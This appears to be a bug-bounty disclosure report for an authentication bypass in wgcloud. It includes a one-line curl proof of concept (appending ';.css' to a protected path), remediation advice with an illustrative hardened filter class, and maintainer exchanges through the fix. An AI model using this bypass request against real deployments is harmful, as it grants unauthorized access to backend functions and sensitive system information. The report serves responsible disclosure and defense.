Auth bypass via improper use of getRequestURL() in tianshiyeben/wgcloud

Valid

Reported on

Mar 29th 2022


Description

wgcloud uses getRequestURL() improperly; an attacker could craft a URL that bypasses wgcloud's authentication.

Normally, when browsing http://[ip]:9999/wgcloud/dash/main without authentication you are redirected to /wgcloud/login/toLogin, but this vulnerability bypasses that redirect.

Proof of Concept

curl 'http://[ip]:9999/wgcloud/dash/main;.css'

HTTP/1.1 200 
Set-Cookie: JSESSIONID=00659E0197260C8DF3988AC21AA987CC; Path=/wgcloud; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Tue, 29 Mar 2022 14:36:24 GMT

The backend page is served with no authentication required.

Impact

This vulnerability allows abuse of the backend functions with no authentication required. An attacker could retrieve sensitive information about the system via this vulnerability.

Occurrences

indexOf is not recommended; the check should be more precise. Use @WebFilter(urlPatterns) instead, or configure the static resource paths in application.properties.

Don't use getRequestURL(); use getServletPath() instead.

indexOf is not recommended; the check should be more precise. Use @WebFilter(urlPatterns) instead, or configure the static resource paths in application.properties.
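As an added illustration (not wgcloud's AuthRestFilter code), the class below models the static-resource exemption of an auth filter: the indexOf-on-URL pattern the report describes next to a hardened check that strips ";" path parameters from every segment and accepts a whitelisted suffix only at the end of the path. Class and method names are hypothetical, and the hardened version also covers other path parameters such as ";jsessionid=..." rather than only the ";.css" case shown in the report.

```java
import java.util.List;

// Added example, not wgcloud's AuthRestFilter: models the static-resource
// exemption in an auth filter. Class and method names are hypothetical.
public class StaticResourceCheck {
    // Suffixes an auth filter typically lets through without a session.
    private static final List<String> STATIC_SUFFIXES = List.of(".css", ".js", ".png", ".ico");

    // Vulnerable pattern: substring match anywhere in the full request URL.
    // "/wgcloud/dash/main;.css" contains ".css", so the filter lets it through.
    public static boolean vulnerableIsStatic(String requestUrl) {
        for (String suffix : STATIC_SUFFIXES) {
            if (requestUrl.indexOf(suffix) != -1) {
                return true;
            }
        }
        return false;
    }

    // Hardened pattern: take the servlet path (no scheme, host or query), drop
    // ";" path parameters from every segment, reject unnormalised paths, and
    // require the whitelisted suffix at the very end of the remaining path.
    public static boolean hardenedIsStatic(String servletPath) {
        StringBuilder clean = new StringBuilder();
        for (String segment : servletPath.split("/", -1)) {
            int semi = segment.indexOf(';');
            clean.append(semi >= 0 ? segment.substring(0, semi) : segment).append('/');
        }
        // Remove the trailing '/' added by the loop.
        String path = clean.substring(0, clean.length() - 1);
        // Anything with dot segments or empty segments is not a plain asset path.
        if (path.contains("/../") || path.contains("/./") || path.contains("//")
                || path.endsWith("/..") || path.endsWith("/.")) {
            return false;
        }
        String lower = path.toLowerCase();
        for (String suffix : STATIC_SUFFIXES) {
            if (lower.endsWith(suffix)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        String[] samples = {
            "/wgcloud/css/main.css",     // genuine asset: both checks true
            "/wgcloud/dash/main;.css",   // reported bypass: vulnerable true, hardened false
            "/wgcloud/dash/main"         // protected page: both false, auth required
        };
        for (String s : samples) {
            System.out.printf("%-26s vulnerable=%-5b hardened=%b%n",
                    s, vulnerableIsStatic(s), hardenedIsStatic(s));
        }
    }
}
```

Running main prints one line per sample, showing that only the hardened check sends the ";.css" request on to the login redirect.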

We are processing your report and will contact the tianshiyeben/wgcloud team within 24 hours. a year ago
hi-unc1e modified the report
a year ago
hi-unc1e modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the tianshiyeben/wgcloud team and are waiting to hear back a year ago
tianshiyeben/wgcloud maintainer has acknowledged this report a year ago
tianshiyeben
a year ago

Maintainer


Thank you very much for your suggestions. I already know how to fix it and have started to make some updates.

hi-unc1e
a year ago

Researcher


OK, can you update the status of this issue, so that a vulnerability serial number can be assigned and we both can get some bonus?

tianshiyeben
a year ago

Maintainer


OK, give me a little more time. I haven't finished it yet. I'll update this status at that time.

tianshiyeben
a year ago

Maintainer


Hello, excuse me, I have now changed the status to valid. Will this bug not be disclosed?

hi-unc1e
a year ago

Researcher


It seems that @tianshiyeben doesn't want to disclose this vuln. I am not quite sure about it, so let's ask the admin. Hi @admin, what should we do if we want to keep this vuln private?

tianshiyeben
a year ago

Maintainer


OK, I still have some work to finish now. I want to wait some time.

hi-unc1e
a year ago

Researcher


Okay, understood.

tianshiyeben
a year ago

Maintainer


Thank you.

Jamie Slome
a year ago

Admin


You can go ahead and mark the report as valid. This will NOT make the report public. Only once you have marked it as fixed, will the report go public 👍

In short, if you tell us a report is fixed, it will be made public.

tianshiyeben validated this vulnerability a year ago

ok

hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the tianshiyeben/wgcloud team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the tianshiyeben/wgcloud team. We will try again in 10 days. a year ago
tianshiyeben
a year ago

Maintainer


Thank you for your feedback and suggestions. I have fixed this bug and released it.

tianshiyeben
a year ago

Maintainer


Thank you for your feedback and suggestions. I have fixed this bug and released it.

Thank you again.

tianshiyeben
a year ago

Maintainer


I found that I can't mark it as repaired. There is no response after clicking the button. Can the administrator help me, @admin?

tianshiyeben marked this as fixed in 2.3.7 or 3.3.8 with commit 91f7cb a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
AuthRestFilter.java#L49 has been validated
AuthRestFilter.java#L45-L46 has been validated
AuthRestFilter.java#L56 has been validated
tianshiyeben
a year ago

Maintainer


OK, I've marked it as fixed, @admin.